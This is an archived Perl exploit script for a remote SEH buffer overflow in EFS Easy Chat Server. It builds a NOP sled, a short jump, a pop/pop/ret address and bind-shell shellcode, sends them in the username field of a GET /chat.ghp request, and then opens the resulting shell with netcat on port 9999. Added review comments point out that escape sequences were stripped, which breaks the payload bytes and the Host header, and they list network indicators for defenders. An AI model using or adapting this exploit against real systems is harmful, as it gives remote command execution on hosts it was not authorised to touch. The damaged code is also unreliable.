# Title : EFS Easy Chat Server Authentication Request Buffer Overflow Exploit (pl)
# Published : 2009-03-04
# Author : Dr4sH
#!/usr/bin/perl
#
# EFS Easy Chat Server Authentication Request Buffer Overflow (SEH)
#
# Reference: http://www.milw0rm.com/exploits/8142
#
# Tested in Windows XP Pro SP2-3
#
# Coded by Dr4sH (Bruno F.)
#
# Contact: dr4sh[at]hotmail[dot]com
#
# Thankz: His0ka, str0ke, Vinicius N.
#
#[......................................................]
#
# bt~# perl easychat_server_bof.pl 192.168.1.64
#
# EFS Easy Chat Server Remote BoF Exploit (SEH)
#
# [*] Sending Diabolic request...
# [*] Connecting to bindshell 192.168.1.64:9999
#
# Microsoft Windows XP [versão 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\Easy Chat Server>
#
#[......................................................]
#
# Enjoy!
#
use IO::Socket;
# NOTE(review): as pasted, none of the string literals in this file contain a
# backslash, so "n" is a literal letter and "x90" a literal three-character
# sequence; the archive appears to have stripped escape sequences. Left as-is.
# The script also runs without `use strict`/`use warnings`; every variable
# below is a package global.
print "nEFS Easy Chat Server Remote BoF Exploit (SEH)nn";
# Target host is the single positional argument; it is only checked for presence,
# not validated, and is later interpolated into a shell command (see bottom).
$host = shift || die "Usage: perl $0 <host>n";
# Request payload, assembled in this order: filler (208 repetitions), a short
# jump, an address ($ppr -- the name suggests a pop/pop/ret gadget for the SEH
# overwrite described in the header; not verifiable from this file), then the
# shellcode blob.
$junk = "x90" x 208;
$jmp = "xEBx06xAExFA";
$ppr = "xB6xB2x01x10";
# Shellcode as published. The file does not state what it does beyond the
# bind shell on TCP 9999 that the script connects to afterwards.
$shellcode = "xd9xe8xd9x74x24xf4xbbxb6x14x60xe5x5dx33xc9xb1".
"x50x31x5dx19x03x5dx19x83xedxfcx54xe1x9cx8fx73".
"x47xb5xa9x7cxa7xbax2ax09x34x61x8fx86x80x55x44".
"xe4x0fxdex5bxfbx9bx51x44x88xc3x4dx75x65xb2x06".
"x41xf2x44xf7x9bxc4xdexabx58x04x94xb4xa1x4ex58".
"xbaxe3xa5x97x87xb7x1dx70x8dxd2xd6xdfx49x1cx03".
"xb9x1ax12x98xcdx42x37x1fx39x7fx6bx94x34xecx57".
"xb6x27x2exa6x1dxc3x3bx8ax91x87x7cx01x5axe7x60".
"xb4xd7x48x91x98x8fxc6xefx2axa3x87x10xe4x5dx7b".
"x89x61x92x49x3dx05xa7x9fxe2xbdxb8x30x74xf5xab".
"x4dxbex59xccx78x9exd0xd7xe3xa0x0ex1fxeexf7xba".
"x1dx11x27x52xf8xe4x3dx0exadx09x6bx02x02xa5xc7".
"xf6xe7x1axabxabx18x4cx4dx24xc1x62xf4xe7x84x9c".
"x6dx6fx32x44xfexb7x6dx86x28x5dx81x29x80x5dx71".
"xa1x8ex0fx5fxdbx98xb0x49x48x72xb0xa5x07x99x07".
"xc3x91x36x67x1dx71xedxc3xf4x8dxddx7fx9ex96xa7".
"xb9x27x0exa7x90x82x4fx87x7bx46xd4x4execxf5x79".
"x06x09x93xd1x41xfbxafx5bx96x91x6bxd5xbbx57xb3".
"x16x91x66x71xf4x18xd4x59x95x68xa3x99x32xd9xff".
"xb1x36xe0xb3x57x48x69xf0xa8x60xc9xafx04xdcxbf".
"x1exc2xdfx6exf0x47xb1x6fx22x0fx9cx49xc6x01x8d".
"x96x1fxf7xcdx96x97xf8xe2xe2x8fxfax80x31x4bxfd".
"x51xebx6bxd1x36xfcx1exd5x99xafxe1x03xdax80x14";
$buffer = $junk.$jmp.$ppr.$shellcode;
# Plain TCP connection to the chat server's HTTP port; 1-second connect timeout.
$socket = IO::Socket::INET->new(PeerAddr=> $host,
PeerPort=> '80',
Proto=> 'tcp',
Timeout=>'1') || die "[-] Unable to Connect.!n";
print "[*] Sending Diabolic request...n";
# The overflow is delivered in the `username` query parameter of GET /chat.ghp.
# For defenders: a request to /chat.ghp whose username value is several hundred
# bytes long is the on-the-wire artefact of this exploit; the other parameters
# are fixed filler values.
print $socket "GET /chat.ghp?username=".$buffer."&password=ydw&room=2&ydw=2 HTTP/1.1rn";
# NOTE(review): with the escapes stripped, Perl parses `$hostrnrnrn` as a single
# (undefined) variable name, so this header line is not what the author intended.
print $socket "Host: $hostrnrnrn";
close($socket);
# Post-exploitation: expects the shellcode to have opened a bind shell on TCP 9999
# on the target, and hands the terminal to netcat. The host argument is
# interpolated into a single-string system() call, i.e. it goes through the
# shell unescaped. For defenders: a new listener on 9999 on a host running
# Easy Chat Server, or inbound connections to it, is the post-exploitation signal.
print "[*] Connecting to bindshell $host:9999nn";
system("nc $host 9999");